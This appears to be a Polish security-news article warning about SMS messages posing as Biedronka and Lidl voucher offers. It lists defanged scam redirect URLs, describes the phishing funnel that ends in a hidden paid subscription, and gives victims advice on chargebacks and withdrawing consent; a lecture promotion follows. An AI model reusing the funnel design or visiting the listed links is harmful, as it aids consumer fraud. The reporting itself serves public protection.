Wiadomości SMS są wysyłane przez serwis mmdsmart.com, który pozwala na ustawienie dowolnej nazwy nadawcy. Stąd właśnie wiadomości w telefonach ofiar wyglądają jakby nadała je “Biedronka”. Ale równie dobrze, można tam wpisać “Kaczynski” albo “Tusk”.

Szanowny Kliencie!
Twoja paczka jest gotowa do odbioru!
Nr Ref.: BIEDRONKA-3Q297R
Zobacz tutaj >> http://bit[.]ly/2FLo7LE

Wiadomości, które otrzymaliśmy od naszych Czytelników, różniły się numerami referencyjnymi i linkami — ale każdy z nich prowadził do tego samego “scamu”, który de facto jest programem partnerskim (oszust zarabia na prowizjach od ofiar, jeśli uda mu się przekonać ofiary do pozostawienia danych na fałszywych formularzach). Oto adresy docelowe, jakie udało nam się zidentyfikować:

http://sms.mmdsmart[.]com/api/links/448488b1-ee1e-4f70-9fe3-9444f4b16806/redirect/
http://sms.mmdsmart[.]com/api/links/3deb0a0f-45ae-4a27-af2b-fc415c806bf7/redirect/
http://sms.mmdsmart[.]com/api/links/283ab197-24d7-4da8-8b12-c64b8e3700c1/redirect/
http://sms.mmdsmart[.]com/api/links/1315c23f-928e-4cfe-803d-a8d9fe0a4864/redirect/
http://sms.mmdsmart[.]com/api/links/151831f5-36a4-4165-940a-d50bf7538213/redirect/
http://sms.mmdsmart[.]com/api/links/07cc636a-b756-4142-8b67-f693f0586f8a/redirect/
http://sms.mmdsmart[.]com/api/links/a8b33e4f-5e0a-4fa3-a5c2-bfbff760eee7/redirect/
http://sms.mmdsmart[.]com/api/links/0f71eaac-ab55-4f51-9a22-818c9aa1f69c/redirect/
http://sms.mmdsmart[.]com/api/links/7e3892a7-7ce5-48b0-a82a-bebf89177f50/redirect/
http://sms.mmdsmart[.]com/api/links/b3d8e65f-075b-4f23-bdea-88fc75cef4e7/redirect/
http://sms.mmdsmart[.]com/api/links/4dce2647-5062-4e5f-92f3-726c79d42681/redirect/
http://sms.mmdsmart[.]com/api/links/3e836776-49ae-4d55-8537-af404b6207cf/redirect/
http://sms.mmdsmart[.]com/api/links/4de0641a-a7a8-4934-9ca7-1a1c770ccd4e/redirect/
http://sms.mmdsmart[.]com/api/links/4f80677e-7aeb-4b5a-95bd-889337d91754/redirect/
http://sms.mmdsmart[.]com/api/links/de9e6bc1-eb71-49cc-9c4d-aa6b5d7fcc92/redirect/
http://sms.mmdsmart[.]com/api/links/18818111-1eb4-44a1-94d7-81fd1c0fd5d3/redirect/
http://sms.mmdsmart[.]com/api/links/4d5447ce-2932-46f5-907e-e266441c65af/redirect/
http://sms.mmdsmart[.]com/api/links/346872eb-e8e5-4291-ae74-297151422404/redirect/
http://sms.mmdsmart[.]com/api/links/f5e6c206-4621-4257-a1dd-8fa6b4f65da8/redirect/
http://sms.mmdsmart[.]com/api/links/61f2f6b8-ffef-4e23-925f-991b5c072a88/redirect/
http://sms.mmdsmart[.]com/api/links/a3b01edf-6cfc-46d4-b8c5-113ab2106c69/redirect/
http://www.r5.ms/s/2pvauz/1jr

Co się pod nimi kryje? W przypadku kampanii Lidla to:

A w przypadku kampanii Biedronki to:

Jak widać — różnice znikome. Dlatego dalszą część artykułu opisującą kolejne kroki oszustwa pokażemy na przykładzie Biedronki:

Na pierwszej stronie widzimy komunikat, który informuje o rozdawaniu bonów o wartości 300 PLN oraz fałszywe opinie rzekomych odbiorców. Po naciśnięciu “zaakceptuj” jesteśmy przenoszeni na następującą podstronę, informującą o tym, że nam też przyznano bon. Trzeba tylko odpowiedzieć na kilka pytań (czy jesteś mężczyzną czy kobietą, czy mieszkasz w Polsce, itp.)

Po fałszywej animacji weryfikujące udzielone przez nas odpowiedzi, widzimy prośbę o potwierdzenie chęci odebrania nagrody:

Potem trzeba podać e-maila i hasło. Zwróćcie uwagę na URL i parametr affiliate, który zdradza, na czym zarabia oszust.

Na koniec ofierze podstawiany jest formularz po angielsku, co miejmy nadzieję sprawi, że większość “Grażyn” i “Januszy” go nie przejdzie. Ofiara proszona jest o podanie numeru karty — i tu znów większość powinna odpaść, bo Polacy z reguły nie płacą kartą przez internet (co w sumie jest smutne, bo dla swojego bezpieczeństwa powinni — wyjaśnienie dlaczego, znajdziecie w drugim odcinku naszego niebezpiecznikowego podcastu “Na Podsłuchu”).

Drobny druczek na dole tej strony pokazuje ile straci ofiara, która połakomiła się na “bon o wartości 300 PLN”:

By completing this transaction you certify that you agree to the Terms and Conditons , and have read our Privacy Policy . This offer includes a 7-day free trial to bookbugg.com. After 7 days bookbugg.com membership renews automatically at $49.95 every 30 days until cancelled. SIMPLY CANCEL YOUR MEMBERSHIP BEFORE THE TRIAL PERIOD ENDS TO AVOID BEING CHARGED.

Więc jeśli ktoś z Waszych mniej technicznych znajomych będzie się po długim weekendzie chwalił, że “wygrał” bon do Biedronki lub Lidla na 300 stówy, dajcie mu znać, żeby zawiesił swoją subskrypcję w serwisie.

Ile osób dało się nabrać?

A ofiar kilka wśród znajomych może się znaleźć… z analizy kliknięć wynika, że każda partia SMS-ów (czyli wiadomość o unikatowym linku) została wysłana do grupy ponad 1500 osób (pytanie ile było linków na każdą z kampanii). Oto statystyki kliknięć dla jednego z linków z SMS-a (każdy odnotował powyżej 1500 kliknięć):

Podsumowując dostępne nam dane: ponad 22 500 osób kliknęło na linka. Statystyka podpowiada, że co najmniej kilka z nich wypełniło formularz i zapisało się na tę subskrypcję….

Mój kolega dał się nabrać — co robić, jak żyć?

Ten SMS-owy atak, to powtórka ataku sprzed miesiąca, gdzie ten sam oszust podszywał się pod MediaMarkt. Dlatego poniżej powtarzamy dokładnie te same ready, który udzielaliśmy Wam miesiąc temu.

Jeśli znacie kogoś, kto podał na powyższych stronach dane swojej karty, to przekażcie mu, aby zastosował się do poniższych porad, jakie od lat przekazujemy naszym klientom w ramach szkoleń z cyberbezpieczeństwa dla firm:

  • Zrób CHARGEBACK, jeśli podałeś dane karty płatniczej i została ona już obciążona. Po prostu skontaktuj się z bankiem i poproś o cofnięcie transakcji metodą Chargeback. Słowo “chargeback” jest kluczowe. Podaj je w rozmowie z konsultantem w banku i poproś o przesłanie formularza dla tego typu reklamacji.
    Każdy właściciel karty płatniczej (i debetowej i kredytowej) ma prawo wykonać Chargeback, czyli cofnąć transakcję z wyciągu. Bank cofnie transakcje i zwróci środki na Wasze konto, a jednocześnie przekaże sprawę do organizacji płatniczej, która może ukarać finansowo sprzedawcę (czyli tutaj organizatora “konkursu” lub oszusta który promował go przez podszywające się pod MediaMarkt SMS-y). I warto to zrobić, bo im więcej takich “kar” tym większa szansa, że pośrednik w płatnościach całkowicie zablokuje organizatorowi “konkursu” przyjmowanie płatności kartami płatniczymi.
  • Wycofaj zgody na przetwarzanie i odsprzedawanie Twoich danych osobowych. Jeśli komuś podałeś swoje dane osobowe, a po namyśle chciałbyś je wycofać, zrób to za pomocą tego formularza. Masz do tego prawo. Wydrukuj formularz, podpisz i prześlij pocztą za zwrotnym potwierdzeniem odbioru, albo zwykłym e-mailem do firmy, która korzysta z Twoich danych (czyli np. wysyła Ci spam). Firma musi przestać przetwarzać Twoje dane. Jeśli tego nie zrobi, a dysponujesz np. podpisanym potwierdzeniem odbioru, po 25 maja, czyli po wejściu w życie GDPR/RODO, będziesz mógł domagać się sporego odszkodowania.
  • Zawsze czytaj regulaminy konkursów i serwisów, które coś Ci obiecują. Pamiętaj, że nawet w internecie nikt nie rozdaje telefonów czy kilkuset złotowych bonów za darmo. Tego typu oszustw jak ten scam bony z Biedronki/Lidla lub wcześniejszy na iPhona z MediaMarkt jest w sieci dużo i wielu oszustów różnie je realizuje. Inne podobne przekręty to opisywane przez nas w kwietniu oszustwo na fałszywe bony do TESCO i Żabki oraz “bezpłatne” bilety lotnicze wyłudzające dane osobowe.
  • Za zakupy w internecie płać kartą, zwłaszcza na podejrzanych stronach lub w sklepie z którego usług wcześniej nie korzystałeś i nie wiesz, czy jest “sprawdzony”. Właśnie ze względu na możliwość CHARGEBACK-u, czyli bezkosztowego wycofania transakcji, gdyby coś poszło nie tak. Polacy boją się płacić kartą przez internet, ale to paradoksalnie jeden z najbezpieczniejszych dla naszych finansów sposobów płatności, bo transakcje kartą zawsze można wycofać, jeśli sprzedawca nas oszuka i nie dostaniemy tego, co chcieliśmy. Po prostu karty płatnicze są ubezpieczone. Przelewów nie da się wycofać. Blików też nie. Dlatego w internecie sugerujemy płacić kartą. To po prostu mniejsze ryzyko i wbrew pozorom większa ochrona naszych pieniędzy.
    Bezpieczeństwu kart płatniczych poświęciliśmy drugi odcinek naszego niebezpiecznikowego podcastu “Na Podsłuchu”. Dowiesz się z niego nie tylko o CHARGEBACK-u, ale i o innych trickach, które pozwolą Ci taniej i bezpieczniej kupować rzeczy w sieci. Zapraszamy do podsłuchania!

Te 4 przytoczone powyżej porady to tylko część informacji, jakie powinien posiadać każdy użytkownik komputera, smartfonu i internetu. W sieci, nie tylko w trakcie zakupów internetowych, czai się na Ciebie więcej pułapek. O wszystkich aktualnych atakach i oszustwach wymierzonych w Polaków oraz przede wszystkim o tym jak się przed nimi chronić opowiadamy podczas naszego 3h wykładu pt. “Jak nie dać się zhackować“. W maju wygłosimy ten wykład w Warszawie, Krakowie, Łodzi, Gdańsku i Wrocławiu. Zapraszamy do zapoznania się z pełną agendą i do rezerwacji miejsc!

PS. Dziękujemy Czytelnikom, którzy przesłali nam SMS-y z tej kampanii …i prosimy o więcej. Jeśli czytasz ten artykuł i dostałeś taką lub podobną wiadomość, prześlij nam treść SMS-a na redakcyjną skrzynkę e-mail (redakcja@niebezpiecznik.pl) lub poprzez formularz kontaktowy.


Aktualizacja 6.05.2018, 18:32
Wysyłka wciąż trwa. Zaktualizowaliśmy artykuł o kolejne linki pod które przekierowywani są Polacy.


Aktualizacja 11.05.2018, 21:29
Właśnie ruszyła kolejna kampania. Treść taka sama.

Przeczytaj także:

<!-- Similar Posts took 9.385 ms -->

April 26 2018

09:19

📌 “Jak nie dać się zhackować?” w Gdańsku i Wrocławiu

Za tydzień będziemy w Gdańsku (23 maja) a w lipcu wybieramy się do Wrocławia (11 lipca). Właśnie ruszyła przedsprzedaż biletów, dzięki czemu na wykład możecie wejść po sporo niższej cenie. Ale śpieszcie się z rejestracją, bo liczba tych promocyjnych biletów jest ograniczona.

Z wykładu dowiesz się jak poprawnie zabezpieczyć swoje dane przed hackerami i jak bezpiecznie używać internetu do bankowości oraz zakupów online. W 3 godziny pokażemy Ci na żywo najpopularniejsze ataki, jakie codziennie czyhają na Polaków. Nauczymy Cię jak je wykrywać i jak się przed nimi zabezpieczyć. Wiedzę przekazujemy z humorem i przystępnie. Każdy kto korzysta z komputera i internetu bez problemu nas zrozumie. Twoi rodzice i nietechniczni znajomi również, dlatego wiec weź ich ze sobą!

Podsumowanie pierwszej tury wykładów

Generalnie, to daliśmy czadu. Od momentu startu projektu “Jak nie dać się zhackować?” w styczniu 2018 zorganizowaliśmy już 5 wykładów w największych polskich miastach i łącznie przeszkoliliśmy ponad 1000 osób, po brzegi wypełniając sale wykładowe w Warszawie, Krakowie, Bydgoszczy i Wrocławiu. Ale najbardziej nas cieszy, że z powykładowych ankiet wynika, iż każdy poleciłby udział w tym wykładzie swoim znajomym. I o to nam właśnie chodziło. Aby wykład był przystępny dla każdego, także Waszych rodziców. Bardzo, bardzo cieszymy się, że to się udało i na widowni mieliśmy zarówno 16 latków jak i 61 latków.

Wisienką na torcie jest to, jaką średnią ocenę temu wykładowi wystawili uczestnicy: 9.4 na 10. Nie mogło być inaczej — ten wykład to petarda! :) Zresztą sami popatrzcie na kilka opinii uczestników (więcej znajdziecie tutaj):

Najlepszy wykład na jakim byłem od niepamiętnych lat. Brawo

Generalnie, treść i sposób prezentacji – bez zastrzeżeń. Wszystko przemyślane, dopracowane, poparte wysokim poziomem merytorycznym autorów. To widać.

Do tej pory nie mogę dojść do siebie po tak świetnie spędzonym czasie. jesli tylko bedzie kolejny taki wykład w okolicy zapisze się na pewno i namówie na to znajomych.

To był jeden z najlepiej przygotowanych warsztatów na jakich byłam. Prowadzący jest charyzmatyczny, bardzo merytoryczny, siedząc na końcu sali byliśmy w stanie zrozumieć każde słowo. To był dobrze spędzony czas, dzięki

Bardzo dobra sesja Q&A na końcu, każdy mógł zadać pytanie, dowolne i do woli – to się ceni. Dzięki!

Był to naprawdę świetny wykład. Polecę go każdemu ze znajomych czy z rodziny. Uważam, że właśnie w taki sposób powinna być przekazywana wiedza na temat bezpieczeństwa w internecie.

Wykład trwał 4 godziny z 5-minutową przerwą. A ja właściwie nie zauważyłem, kiedy te 4 godziny zleciały! Naprawdę dobrze przygotowany i przeprowadzony wykład. A nasłuchałem się już wielu wykładów.

Bardzo dobry wykład, nawet jako osoba techniczna warto się na niego wybrać, ponieważ niektóre rzeczy, które się zna, to warto jeszcze usłyszeć.

Podsumowujemy właśnie wszystkie wypełnione ankiety (a jest ich 700+) i wsłuchujemy się w uwagi i sugestie uczestników i wiemy, co musimy poprawić, aby odbiór wykładu był bardziej komfortowy. Zadbamy o sale z większą liczbą ekranów i wydłużymy przerwę w środku wykładu. A to oznacza, że druga tura wykładu będzie jeszcze “mocniejsza”. Dlatego, jeśli jeszcze się nie zarejestrowałeś, zrób to i namów na udział swoich znajomych. Gwarantujemy (i stoją za tym silne liczby!) że jeśli na wykład przyjdziesz sam, będziesz żałować, żę nie wziąłeś ze sobą najbliższych!

O samym wykładzie

Ten artykuł wrzucamy po to, aby po prostu powiadomić Was o nowej turze zapisów na nasze wykłady, które za 2 tygodnie odbędą się w różnych miejscach w Polsce. Opis samego wykładu, spis tematów jakie na nim poruszamy oraz powody, dla którego warto na niego przyjść opisaliśmy na …podstronie wykładu, którą warto odwiedzić :) A jeśli jesteś już zdecydowany, aby wziąć udział w naszym wykładzie, to poniżej znajdziesz listę linków wprost do rejestracji na każdy z aktualnie dostępnych terminów:

Do zobaczenia!

Przeczytaj także:

<!-- Similar Posts took 9.604 ms -->

Older posts are this way If this message doesn't go away, click anywhere on the page to continue loading posts.
Could not load more posts
Maybe Soup is currently being updated? I'll try again automatically in a few seconds...
Just a second, loading more posts...
You've reached the end.

Don't be the product, buy the product!

Schweinderl